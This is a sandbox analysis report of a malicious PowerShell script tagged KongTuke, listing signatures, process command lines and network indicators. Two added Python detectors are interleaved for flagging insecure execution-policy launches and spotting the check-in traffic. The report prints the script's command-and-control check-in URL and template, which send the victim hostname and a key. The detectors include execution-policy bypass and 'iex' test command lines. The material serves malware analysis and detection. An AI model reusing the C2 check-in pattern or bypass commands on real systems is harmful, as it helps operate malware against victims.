
Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1582439
MD5: f6ab611e38035ef4886d5526e7b9a88a
SHA1: 8569435224c6c52737fb5114a073e62a1a32de21
SHA256: 1522bd349cec20303ee2c3bf624f52e02b179bc5fc597bec575f7d34c213b3e5
Tags: KongTuke, ps1, user-monitorsg

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 2008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2008, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2008, ProcessName: powershell.exe
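The two Sigma hits above fire on the launch command line `powershell.exe -noLogo -ExecutionPolicy unrestricted -file "...\download.ps1"`. As an added example (not part of the Joe Sandbox report and not the Sigma rules it cites), the following Python reimplements that check over process-creation command lines the way a SIEM rule would: it flags `-ExecutionPolicy` set to Unrestricted or Bypass, including the shortened `-ex...`/`-ep` spellings and the `/` switch character that powershell.exe's own parser accepts, catches `Set-ExecutionPolicy` inside a `-Command` payload, and extracts the `-File` target. The first sample command line is the report's; the others are constructed test inputs, and the tokenizer is deliberately small (no escaped-quote handling).

```python
"""Flag powershell.exe launches that weaken the execution policy.

Added example, not code from the Joe Sandbox report or from the Sigma
rules it cites. Input is the 'CommandLine' value of a process-creation event.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

INSECURE_POLICIES = {"unrestricted", "bypass"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell", "pwsh"}

# Set-ExecutionPolicy <policy> or Set-ExecutionPolicy -ExecutionPolicy <policy>
# carried inside a -Command payload.
SET_POLICY_RE = re.compile(
    r"set-executionpolicy\s+(?:-executionpolicy\s+)?([a-z]+)", re.IGNORECASE)


@dataclass(frozen=True)
class PolicyFinding:
    policy: str            # normalised policy name, e.g. "unrestricted"
    via: str               # "switch" (-ExecutionPolicy) or "cmdlet" (Set-ExecutionPolicy)
    script: Optional[str]  # -File argument, if one was given


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs
    together. Deliberately small: escaped quotes are not handled."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def _switch_name(token: str) -> Optional[str]:
    """powershell.exe accepts '-' or '/' as the switch character."""
    if len(token) > 1 and token[0] in "-/":
        return token[1:].lower()
    return None


def is_execpolicy_switch(token: str) -> bool:
    """-ExecutionPolicy, any prefix of it from -ex onward, or the alias -ep
    (case-insensitive). A bare -e is ambiguous with -EncodedCommand and is
    therefore not accepted, matching powershell.exe's behaviour."""
    name = _switch_name(token)
    if name is None:
        return False
    return name == "ep" or (name.startswith("ex") and "executionpolicy".startswith(name))


def is_file_switch(token: str) -> bool:
    """-File may be shortened down to -f."""
    name = _switch_name(token)
    return name is not None and name.startswith("f") and "file".startswith(name)


def check_powershell_policy(cmdline: str) -> Optional[PolicyFinding]:
    """Return a finding when the command line is a PowerShell launch that sets
    an insecure execution policy; None otherwise. Non-PowerShell images return
    None too, so a wrapper such as `cmd.exe /c powershell ...` has to be
    resolved to its child process by the caller."""
    tokens = split_cmdline(cmdline)
    if not tokens:
        return None
    image = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL_IMAGES:
        return None

    policy = via = script = None
    for i in range(1, len(tokens) - 1):          # each switch reads the next token
        if is_execpolicy_switch(tokens[i]):
            policy, via = tokens[i + 1].lower(), "switch"
        elif is_file_switch(tokens[i]):
            script = tokens[i + 1]

    if policy is None:
        m = SET_POLICY_RE.search(cmdline)
        if m:
            policy, via = m.group(1).lower(), "cmdlet"

    if policy in INSECURE_POLICIES:
        return PolicyFinding(policy, via, script)
    return None


# The first line is the report's own command line; the rest are constructed.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
    r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"',
    r'powershell.exe -NoProfile -Command Get-Process',
    r'powershell -nop -w hidden -ep bypass -c "iex (gc C:\temp\x.txt)"',
    r'pwsh.exe -Command "Set-ExecutionPolicy Bypass -Scope Process; . .\run.ps1"',
    r'pwsh.exe -ExecutionPolicy RemoteSigned -File C:\build\ci.ps1',
]


def scan(cmdlines: List[str]) -> List[PolicyFinding]:
    """Findings for every command line that sets an insecure policy, in order."""
    return [f for f in (check_powershell_policy(c) for c in cmdlines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding)
```

RemoteSigned is deliberately not flagged: it is the default on Windows Server and does not by itself allow an unsigned local script to run the way Unrestricted or Bypass does.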
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-12-30T16:14:02.027665+0100  2057741  1         A Network Trojan was detected  192.168.2.4  49730        45.61.136.138    80                TCP

Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-12-30T16:14:02.027665+0100  1810000  1         Potentially Bad Traffic        192.168.2.4  49730        45.61.136.138    80                TCP
2024-12-30T16:14:02.666431+0100  1810000  1         Potentially Bad Traffic        192.168.2.4  49731        142.250.185.132  80                TCP


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 85.1% probability
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb6 source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb?W source: powershell.exe, 00000000.00000002.1777765113.00000287F3F0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1779315827.00000287F4190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbdb\ source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.132:80
Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: Network traffic; Suricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.google.com; Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 45.61.136.138
Source: Joe Sandbox View; ASN Name: AS40676 US
Source: global traffic; HTTP traffic detected: GET /du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: kdemjgebjimkanl.top; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: www.google.com; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: kdemjgebjimkanl.top
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DF00E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DECEA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=527
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1776222589.00000287F3C10000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://kdemjgebjimkanl.top
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD122000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527
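The check-in above has a fixed shape that the script's own URL template, recovered from memory a few lines up (`http://$.../$....php?id=$env:computername&key=$...&s=527`), makes explicit: the default Windows PowerShell 5.1 User-Agent, cleartext port 80, and a `/<random>.php?id=<hostname>&key=<digits>&s=<digits>` query. As an added example, not part of the Joe Sandbox report, here is a Python triage pass over proxy-style log lines that scores those traits separately, so the connectivity probe to www.google.com and the C2 check-in come out with different findings and the victim hostname and key are pulled from the latter. The tab-separated log format and every log line other than the two restating the report's requests are constructed for the example, the placeholder destination IPs come from the 203.0.113.0/24 documentation range, and the finding names are this example's own rather than ET or Joe Security rule names.

```python
"""Triage HTTP log lines for the PowerShell check-in pattern in the report.

Added example, not part of the Joe Sandbox report. The log format and the
non-report lines are constructed; finding names are this example's own.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Default User-Agent sent by Invoke-WebRequest / Invoke-RestMethod on Windows
# PowerShell 5.1, as seen verbatim in the report's requests.
PS_UA_RE = re.compile(r"\bWindowsPowerShell/\d+\.\d+")

# Path shape of the check-in: a random alphanumeric name ending in .php at the
# site root. Host and path name are per-campaign, so only structure is matched.
CHECKIN_PATH_RE = re.compile(r"^/[a-z0-9]{8,}\.php$", re.IGNORECASE)

# Constructed tab-separated log format used by this example.
FIELDS = ("ts", "client", "dst_ip", "dst_port", "host", "method", "uri", "user_agent")
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
CHROME_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/131.0 Safari/537.36"

# Rows 1-2 restate the report's two requests; rows 3-4 are constructed controls
# (a browser request, and PowerShell talking TLS to a legitimate host).
SAMPLE_LOG = "\n".join([
    "\t".join(["2024-12-30T16:14:02.027", "192.168.2.4", "45.61.136.138", "80",
               "kdemjgebjimkanl.top", "GET",
               "/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527", PS_UA]),
    "\t".join(["2024-12-30T16:14:02.666", "192.168.2.4", "142.250.185.132", "80",
               "www.google.com", "GET", "/", PS_UA]),
    "\t".join(["2024-12-30T16:15:10.100", "192.168.2.4", "203.0.113.10", "443",
               "example.com", "GET", "/index.html", CHROME_UA]),
    "\t".join(["2024-12-30T16:16:00.000", "192.168.2.4", "203.0.113.20", "443",
               "www.powershellgallery.com", "GET", "/api/v2/", PS_UA]),
])


def parse_log_line(line: str) -> Optional[Dict[str, str]]:
    """One log line -> field dict, or None when the column count is wrong."""
    fields = line.rstrip("\n").split("\t")
    return dict(zip(FIELDS, fields)) if len(fields) == len(FIELDS) else None


def checkin_params(uri: str) -> Optional[Dict[str, str]]:
    """Return id/key/s when the URI has the report's check-in shape
    (/<random>.php?id=<host>&key=<digits>&s=<digits>), else None."""
    parts = urlsplit(uri)
    if not CHECKIN_PATH_RE.match(parts.path):
        return None
    qs = parse_qs(parts.query)
    if not {"id", "key", "s"} <= set(qs):
        return None
    victim_id, key, s = qs["id"][0], qs["key"][0], qs["s"][0]
    if not (key.isdigit() and s.isdigit()):
        return None
    return {"victim_id": victim_id, "key": key, "s": s}


def classify(req: Dict[str, str]) -> Dict[str, object]:
    """Independent findings for one request: PowerShell UA (split by cleartext
    vs TLS port) and the check-in URI pattern."""
    findings: List[str] = []
    if PS_UA_RE.search(req["user_agent"]):
        findings.append("powershell_http_cleartext" if req["dst_port"] == "80"
                        else "powershell_http")
    params = checkin_params(req["uri"])
    if params is not None:
        findings.append("checkin_uri_pattern")
    return {"host": req["host"], "dst": f'{req["dst_ip"]}:{req["dst_port"]}',
            "findings": findings, "checkin": params}


def scan(log_text: str) -> List[Dict[str, object]]:
    """One record per request that raised at least one finding, in log order."""
    results = []
    for line in log_text.splitlines():
        req = parse_log_line(line)
        if req is None:
            continue
        rec = classify(req)
        if rec["findings"]:
            results.append(rec)
    return results


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec)
```

Keeping the User-Agent and URI findings independent is the point: a PowerShell User-Agent alone is common on admin hosts (module installs, API calls), while the check-in structure with a hostname in `id` and a numeric `key` is what separates the beacon from background noise, and only their combination over port 80 reproduces the report's picture.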
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE022000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE01E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE34E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE35D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE33F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE045000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1719127106.00000287DEB06000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/webhp?tab=ww
